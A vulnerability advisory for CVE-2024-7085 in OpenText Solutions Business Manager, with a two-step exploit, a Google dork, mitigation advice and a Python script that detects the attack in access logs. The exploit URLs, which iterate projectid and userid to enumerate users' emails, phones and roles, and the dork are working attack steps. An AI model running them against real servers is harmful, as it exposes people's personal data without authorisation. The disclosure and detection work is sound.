CVE-2024-7085 Exposure of Private Information OpenText SBM Exploit

From the project webpage: "OpenText™ Solutions Business Manager is enterprise-scale business process automation software. It helps IT quickly create, adapt, deploy, and govern process-based apps and workflows for humans and systems across the organization."


Summary

If the SBM application has anonymous submit enabled on any project, it creates a session for the "Anonymous" user when the AnonymousSubmitPage page is opened. This session can be used to enumerate application users and retrieve their personal information. Without the Anonymous user session, the vulnerable endpoint returns an authentication failure.

Details listed: email address, full name, mobile phone, application role, etc.

Exploit

Step 1: Search for an available AnonymousSubmitPage by iterating the "projectid" parameter:

https://example.com/tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=1

Once a project with anonymous submit is found, copy cookies from the response for the next step.

Step 2: Search for users by iterating the "userid" parameter:

https://example.com/tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=1

Affected versions

<12.2.1

Check the version at:

https://example.com/tmtrack/tmtrack.dll?shell=swc&StdPage&template=newwebadmin/aboutwebadmin.xml&noredirect=true

Google dork

inurl:tmtrack/tmtrack.dll

Mitigation

Update to version 12.2.1 or higher. 
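
For instances that were exposed before the update, the web server access log can show whether the two requests described above were chained. The following detection sketch is an added example, not part of the original advisory or of OpenText's code. It assumes common-log-format lines, uses the client IP as the correlation key, and uses a hypothetical function name and an arbitrary threshold of three distinct userid values.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); not taken from a real server.
SAMPLE_LOG = """\
198.51.100.21 - - [01/Jan/2025:09:58:00 +0000] "GET /tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=3 HTTP/1.1" 200 900
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=1 HTTP/1.1" 200 310
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=2 HTTP/1.1" 200 900
203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=1 HTTP/1.1" 200 640
203.0.113.7 - - [01/Jan/2025:10:00:06 +0000] "GET /tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=2 HTTP/1.1" 200 652
203.0.113.7 - - [01/Jan/2025:10:00:07 +0000] "GET /tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=3 HTTP/1.1" 200 631
203.0.113.7 - - [01/Jan/2025:10:00:08 +0000] "GET /tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=4 HTTP/1.1" 200 648
198.51.100.20 - - [01/Jan/2025:10:03:00 +0000] "GET /tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=5 HTTP/1.1" 200 655
"""

# Client address and request target of one log line.
REQUEST_RE = re.compile(r'^(\S+) [^"]*"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def find_profile_enumeration(log_text, min_userids=3):
    """Map client IP -> sorted userids for clients that opened AnonymousSubmitPage
    and then fetched profile cards for at least min_userids distinct users."""
    opened_anonymous = set()
    userids = defaultdict(set)
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/tmtrack.dll"):
            continue
        # keep_blank_values keeps bare keys such as "AnonymousSubmitPage".
        parsed = parse_qs(url.query, keep_blank_values=True)
        query = {key.lower(): values for key, values in parsed.items()}
        if "anonymoussubmitpage" in query:
            opened_anonymous.add(client)
        elif (client in opened_anonymous
              and "getuserprofilecard" in [c.lower() for c in query.get("command", [])]):
            # Only count profile-card requests made after the anonymous page was opened.
            userids[client].update(int(u) for u in query.get("userid", []) if u.isdecimal())
    return {c: sorted(ids) for c, ids in userids.items() if len(ids) >= min_userids}


if __name__ == "__main__":
    for client, ids in find_profile_enumeration(SAMPLE_LOG).items():
        print(f"{client}: profile cards requested for userids {ids}")
```

Clients behind a shared proxy or NAT will be merged under one address, so treat a hit as a lead for review rather than proof of enumeration.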
